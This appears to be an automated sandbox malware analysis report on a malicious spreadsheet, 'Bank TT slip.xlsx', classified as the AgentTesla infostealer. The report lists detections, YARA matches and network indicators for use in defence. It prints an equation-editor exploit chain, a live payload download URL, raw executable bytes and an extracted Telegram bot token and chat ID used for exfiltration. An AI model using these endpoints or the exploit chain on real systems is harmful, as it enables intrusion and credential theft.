Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name:	Bank TT slip.xlsx
Analysis ID:	626166
MD5:	2391e6aa319cba9248661674ac5f2105
SHA1:	bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256:	18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected AntiVM3

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Writes to foreign memory regions

Modifies the hosts file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Shellcode detected

Yara detected Generic Downloader

Office equation editor drops PE file

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Office equation editor establishes network connection

Drops PE files to the user root directory

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Found malware configuration

Source: 5.0.RegSvcs.exe.400000.4.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Bank TT slip.xlsx	Metadefender: Detection: 20%			Perma Link
Source: Bank TT slip.xlsx	ReversingLabs: Detection: 31%

Antivirus detection for URL or domain

Source: http://172.245.27.27/SOA.exe	Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC:	Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe	ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 46%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.0.RegSvcs.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack	Avira: Label: TR/Spy.Gen8

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.245.27.27 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_036805F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680658 ShellExecuteExW,ExitProcess,	2_2_03680658
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680592
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036804ED ExitProcess,	2_2_036804ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680676 ExitProcess,	2_2_03680676
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680641 ShellExecuteExW,ExitProcess,	2_2_03680641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_036805AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680522
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680506

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: api.telegram.org

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 172.245.27.27 172.245.27.27

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:58:18 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28Last-Modified: Thu, 12 May 2022 04:27:00 GMTETag: "cb600-5dec8f8138359"Accept-Ranges: bytesContent-Length: 833024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00 00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00 00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 80 08 00 dc 3f 04 00 03 00 00 00 86 03 00 06 e8 66 01 00 08 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 23 00 00 0a 2a 26 00 02 28 24 00 00 0a 00 2a ce 73 25 00 00 0a 80 01 00 00 04 73 26 00 00 0a 80 02 00 00 04 73 27 00 00 0a 80 03 00 00 04 73 28 00 00 0a 80 04 00 00 04 73 29 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 31 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 32 00 00 0a 00 2a 6a 02 02 7b 07 00 00 04 28 02 00 00 2b 7d 07 00 00 04 02 7b 07 00 00 04 2b 00 2a 6a 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 2b 00 2a 6a 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 2b 00 2a 6a 02 02 7b 0a 00 00 04 28 05 00 00 2b 7d 0a 00 00 04 02 7b 0a 00 00 04 2b 00 2a 6a 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 6a 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 6a 02 02 7b 0d 00 00 04 28 08 00 00 2b 7d 0d 00 00 04 02 7b 0d 00 00 04 2b 00 2a 6a 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27

Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Source: global traffic

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 5.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054

Yara signature match

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB070	4_2_002EB070
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA8F8	4_2_002EA8F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9910	4_2_002E9910
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC970	4_2_002EC970
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EF14E	4_2_002EF14E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EBA80	4_2_002EBA80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5440	4_2_002E5440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E8740	4_2_002E8740
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED808	4_2_002ED808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC959	4_2_002EC959
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EF222	4_2_002EF222
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9A04	4_2_002E9A04
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEA69	4_2_002EEA69
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEA78	4_2_002EEA78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9AB3	4_2_002E9AB3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9A98	4_2_002E9A98
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE420	4_2_002EE420
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5430	4_2_002E5430
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE410	4_2_002EE410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EECA2	4_2_002EECA2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EECB0	4_2_002EECB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEF4A	4_2_002EEF4A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEF58	4_2_002EEF58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED7F9	4_2_002ED7F9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C64DF	4_2_007C64DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C8DDD	4_2_007C8DDD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3EF0	4_2_007C3EF0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C43BF	4_2_007C43BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C0048	4_2_007C0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3010	4_2_007C3010
